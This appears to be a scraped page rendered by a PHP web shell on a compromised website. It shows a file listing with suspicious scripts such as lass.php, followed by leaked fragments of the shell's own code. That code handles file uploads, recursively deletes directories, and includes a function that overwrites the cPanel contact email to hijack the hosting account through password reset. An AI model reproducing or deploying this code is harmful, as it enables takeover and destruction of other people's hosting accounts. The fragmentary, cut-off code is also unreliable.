name file | size | edit | permission | action |
---|---|---|---|---|
.htaccess | 906 KB | January 18 2024 20:05:52 | 0444 | |
css | - | February 22 2025 03:07:50 | 0755 | |
dashboard | - | February 21 2025 20:05:51 | 0755 | |
error_log | 51354 KB | February 27 2025 15:17:58 | 0644 | |
favicon.ico | 0 KB | October 18 2021 11:56:12 | 0644 | |
frontend | - | February 21 2025 20:05:51 | 0755 | |
index.php | 6518 KB | February 21 2025 20:04:34 | 0444 | |
index0.php | 1790 KB | October 18 2021 11:56:12 | 0644 | |
js | - | February 22 2025 03:23:49 | 0755 | |
lass.php | 16962 KB | February 21 2025 20:04:34 | 0644 | |
mix-manifest.json | 72 KB | October 18 2021 17:53:08 | 0644 | |
storage | - | February 22 2025 03:23:28 | 0755 | |
uploads | - | February 22 2025 03:24:05 | 0755 | |
web.config | 1211 KB | October 18 2021 11:56:12 | 0644 |
Failed to move uploaded file.
"; } } else { echo "Error uploading file: " . $file['error'] . "
"; } } break; } } function deleteDirectory($dir) { if (!is_dir($dir)) { return false; } $items = array_diff(scandir($dir), array('.', '..')); foreach ($items as $item) { $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deleteDirectory($path); } else { unlink($path); } } return rmdir($dir); } function reset_cpanel_password($email) { $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $resetUrl = $site . ':2082/resetpass?start=1'; $wr = 'email:' . $email; $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/' . $user . '/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); echo '